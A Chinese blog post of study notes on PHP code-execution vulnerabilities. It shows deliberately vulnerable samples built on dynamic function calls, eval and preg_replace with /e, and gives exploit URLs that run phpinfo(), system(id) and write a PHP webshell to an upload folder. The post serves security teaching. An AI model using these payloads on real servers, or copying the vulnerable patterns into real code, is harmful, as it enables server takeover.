【复习】代码执行_01_漏洞与利用

最新推荐文章于 2024-04-10 13:27:43 发布
最新推荐文章于 2024-04-10 13:27:43 发布
阅读量331 收藏
点赞数 1
分类专栏: 代码执行 文章标签: 代码执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45300786/article/details/117173892
版权

代码执行漏洞与利用

当应用在调用一些字符串转化为代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码注入漏洞(代码执行漏洞)。

PHP eval()、assert()、preg_replace()

python exec()

Java 没有类似于前面两者的函数,但是有反射机制,并且有基于反射机制的表达式引擎,如:0GNL、SpEL、MVEL等

1. 动态代码执行

<?php
function m_print(){
	echo '这是一个页面';
}
$_GET['a']($_GET['b']);
?>

查看php信息
assert 可以执行php里面的一些函数比如phpinfo()

http://www.nmsl.com/code/code01.php?a=assert&b=phpinfo()

在这里插入图片描述

http://www.webtester.com/code/code01.php?a=assert&b=system(id)

在这里插入图片描述
http://www.webtester.com/code/code01.php?a=assert&b=var_dump(1)

2. eval代码执行

<?php  
$data = isset($_GET['data'])?$_GET['data']:'这是一个eval漏洞页面';  
@eval($ret = $data);  
echo $ret;
?>

eval可以执行php代码
http://www.webtester.com/code/code02.php?data=phpinfo();
http://www.webtester.com/code/code02.php?data=system(id);
fputs(fopen(“shell.php”,“a”),"<?php phpinfo();?>");
在这里插入图片描述
写webshell
http://www.webtester.com/code/code02.php?data=fputs(fopen("…/upload/shell.php",“a”),"<?php phpinfo();?>");
在这里插入图片描述

3. 正则代码执行

<?php  
$data = $_GET['data'];  
preg_replace('/<data>(.*)<\/data>/e','$ret = "\\1";',$data);  
?>

<form>
<label>请输入你的数据</label>
<input type='text' name='data'/>
<input type='submit' value='提交'/>
</form>

<data>{${phpinfo()}}</data>
http://www.webtester.com/code/code03.php?data={${phpinfo()}}

在这里插入图片描述

樱浅沐冰
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
代码执行漏洞
qq_38348692的博客
09-15 505
1,漏洞产生原因: 在web应用中,有时候程序员而为了考虑灵活性,简洁性,会在代码调用eval函数去处理,比如应当在调用一些能将字符串转化成代码的函数时,没有考虑到用户是否能够控制这个字符串,造成代码执行漏洞。 2,漏洞产生函数: eval() 1)直接利用漏洞源码: <?php $data = $_GET['data']; eval("\$ret = $data"); echo $ret;...
河大恶意代码期末复习呕心沥血整理版
06-28
ELF文件格式的感染可能涉及修改文件头、插入恶意代码到节区或利用程序执行流程中的漏洞。 【木马的组成部分和植入技术】 特洛伊木马通常包含: 1. **客户端组件**:在受害者的机器上运行,接收远程控制命令。 2. *...
命令执行漏洞利用技巧总结
st3pby的博客
05-19 2474
在红蓝对抗中,远程命令执行漏洞往往是攻击方在正面路径中突破边界非常青睐的。常见的可以执行远程命令的漏洞的有各种JAVA反序列化漏洞、远程代码执行漏洞、远程命令执行漏洞(原生)、表达式执行漏洞、SQL注入漏洞等。远程命令执行漏洞漏洞探测到漏洞利用其实都非常讲究技巧。如果在进行漏洞探测阶段考虑的情况不全就会很容易遗漏漏洞,与漏洞擦肩而过;在漏洞利用阶段如果知识面不广(姿势不够多)的话可能就会陷入苦苦挣扎却无法获取权限的困境。目标操作系统类型、执行命令结果是否有回显以及是否能通外网。
Web漏洞-命令执行代码执行漏洞
Ays.Ie的博客
03-13 1807
该篇描述了web漏洞-命令执行代码执行漏洞
SCJP6.rar_java virus
09-20
在编程领域,病毒和恶意软件通常通过不安全的代码漏洞利用或社交工程手段传播。对于Java开发者来说,了解如何编写安全的代码、识别和防止代码注入攻击、理解Java沙箱机制以限制潜在恶意代码执行,以及如何应用...
CF复习.pdf_vulnerability_网络安全攻防基础知识总结_
10-03
内存攻击是指攻击者利用程序的内存管理漏洞,如缓冲区溢出或格式字符串漏洞,来执行恶意代码。防范这类攻击需要对编程语言特性和安全编程原则有深入了解。 网络攻击涵盖广泛,包括拒绝服务攻击(DoS)和分布式拒绝...
东北大学软件测试复习
11-13
【东北大学软件测试复习题】 在软件工程领域,软件测试是一项至关重要的环节,它确保了产品...在复习过程中,建议结合实际案例分析,加深理解,并与同学讨论交流,共同提升。同时,定期进行模拟测试,以检验学习效果。
中科大苏研院信息安全考试复习
12-08
然而,尽管有这些保护措施,攻击者仍然可能通过精心设计的漏洞利用来绕过这些防护,因此,理解和防范缓冲区溢出仍然是信息安全领域的重要课题。 在复习中科大苏研院的信息安全考试时,考生需要深入理解缓冲区溢出的...
远程代码执行漏洞利用
Z_l123的博客
03-01 368
PHP下,允许命令执行的函数有 eval() assert() preg_replace() call_user_func() $a($b) eval() <?php if(isset($_GET['a'])){ eval($_GET['a']); } else{ echo "Please input a"; } ?> assert() <?php if(isset($_GET['a'])){ assert($_GET['a']); } else{ e
代码执行与命令执行漏洞一览
Amire0x的小乐园
11-08 380
代码执行&命令执行 代码执行 基础 用户可以通过请求将代码注入到应用中最终到WebServer中执行 当应用在调用一些能将字符转化为代码的函数(如PHP中的eval)时, 没有考虑用户是否能控制这个字符串,这就会造成代码执行漏洞。 引起的函数,过滤不严导致 php: eval() assert() 大多是因为载入缓存或者模板一级对变量的处理不严导致的,如直接把一个外部可控的参数拼接到模板里,然后调用这两个函数去当成PHP代码执行 preg_replace() 执行需要存在/e参数,参数是
命令执行漏洞原理与利用
金色%夕阳的博客
04-30 1108
命令执行漏洞原理与利用 1 命令执行漏洞概述 程序员使用脚本语言(比如PHP)开发应用程序过程中,脚本语言开发十分快速、简洁,方便,但是也伴随着一些问题。比如说速度慢,或者无法接触系统底层,如果我们开发的应用,特别是企业级的一些应用需要去调用一些外部程序。当应用需要调用一些外部程序时就会用到一些执行系统命令的函数。 而应用在调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户的输入的情况下,就会造成命令执行漏洞。 远程命令执行漏洞(RCE)是指可以在仅有远程访问权
远程代码执行漏洞利用与防御
qq_45455136的博客
12-07 607
远程代码/命令执行(Remote Code/Command Execute),由于程序中预留了执行代码或命令的接口,并提供了给用户使用的界面,导致被利用控制服务器。
代码执行漏洞 | iwebsec
weixin_52116519的博客
03-04 2424
call_user_func()、call_user_func_array()函数的功能是调用函数,多用在框架中动态调用函数,所以一般比较小的程序较少出现这种方式的代码执行。array_map()函数的作用是调用函数,并且除第一个参数外其他参数为数组,通常会写死第一个参数,即写死调用函数。
91.网络安全渗透测试—[常规漏洞挖掘与利用篇7]—[代码执行漏洞利用]
qwsn
02-02 3080
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、代码执行漏洞简介 1、代码执行漏洞概念: 2、代码执行函数: 二、代码执行漏洞利用 1、动态代码执行漏洞 2、eval代码执行漏洞 3、正则代码执行漏洞
代码执行漏洞笔记
最新发布
weixin_45653478的博客
04-10 671
在 windows 系统下的 cmd 命令中,有以下一些截断拼接符。前面的语句为假则直接执行后面的;&&前面的语句为假则直接出错,后面的也不执行;直接执行后面的语句||前面出错执行后面的在 Linux 系统下的 shell 命令中,有以下一些截断拼接符。给大家强调一下,在 linux 下和在windows下的命令拼接符有一定的区别在 Linux 上,上面的;也可以用 | 、|| 代替;;前面的执行执行后面的ifconfigifconfig| 是管道符,显示后面的执行结果。
让命令执行漏洞无所遁形:详解其利用方式和危害因素
weixin_43263566的博客
02-01 1125
命令执行利用
01”这种字符串 ++ 运算的代码
duling509的专栏
09-18 649
if(new Number(test)     ti = "0" + (new Number(test.charAt(1)) + 1);} else {    ti = "" + (new Number(test) + 1);}
广州大学软件安全期末复习笔记
03-24
笔记围绕漏洞管理和攻击防御展开,包括漏洞生命周期的不同阶段(如0day和1day漏洞)、漏洞的特征(如时间性和广泛性)、以及漏洞利用技术,如二进制漏洞和Web漏洞的分类与分析。 在二进制文件安全方面,提到了PE...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值